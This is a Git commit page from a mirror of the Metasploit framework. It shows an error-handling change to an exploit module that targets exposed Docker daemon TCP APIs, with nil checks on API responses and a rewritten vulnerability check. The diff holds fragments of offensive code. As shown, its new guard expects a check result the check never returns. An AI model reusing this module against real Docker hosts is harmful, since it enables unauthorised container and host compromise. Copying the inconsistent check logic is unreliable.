infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Improved error handling

bug/bundler_fix
Martin Pizala 2017-07-30 09:07:52 +02:00
parent dd0c78484a
commit 60c3882b84
No known key found for this signature in database
GPG Key ID: 50F0D0CE74400C95
1 changed files with 13 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
modules/exploits/linux/http/docker_daemon_tcp.rb
View File

@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri('images', 'json') 'uri' => normalize_uri('images', 'json')
) )
return unless res.code == 200 and res.body.include? image_id return unless res and res.code == 200 and res.body.include? image_id
res res
end end
@ -129,14 +129,24 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => normalize_uri('containers', 'json'), 'uri' => normalize_uri('containers', 'json'),
'headers' => { 'Accept' => 'application/json' } 'headers' => { 'Accept' => 'application/json' }
) )
return Exploit::CheckCode::Vulnerable if res.code == 200 and res.headers['Server'].include? 'Docker'
if res.nil?
print_error('Failed to connect to the target')
return Exploit::CheckCode::Unknown
end
if res and res.code == 200 and res.headers['Server'].include? 'Docker'
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe Exploit::CheckCode::Safe
end end
def exploit def exploit
# check if target is vulnerable # check if target is vulnerable
fail_with(Failure::Unknown, 'Failed to connect to the targeturi') if check.nil? unless check == Exploit::CheckCode::Appears
fail_with(Failure::Unknown, 'Failed to connect to the target')
end
# check if image is not available, pull it or fail out # check if image is not available, pull it or fail out
image_id = datastore['DOCKERIMAGE'] image_id = datastore['DOCKERIMAGE']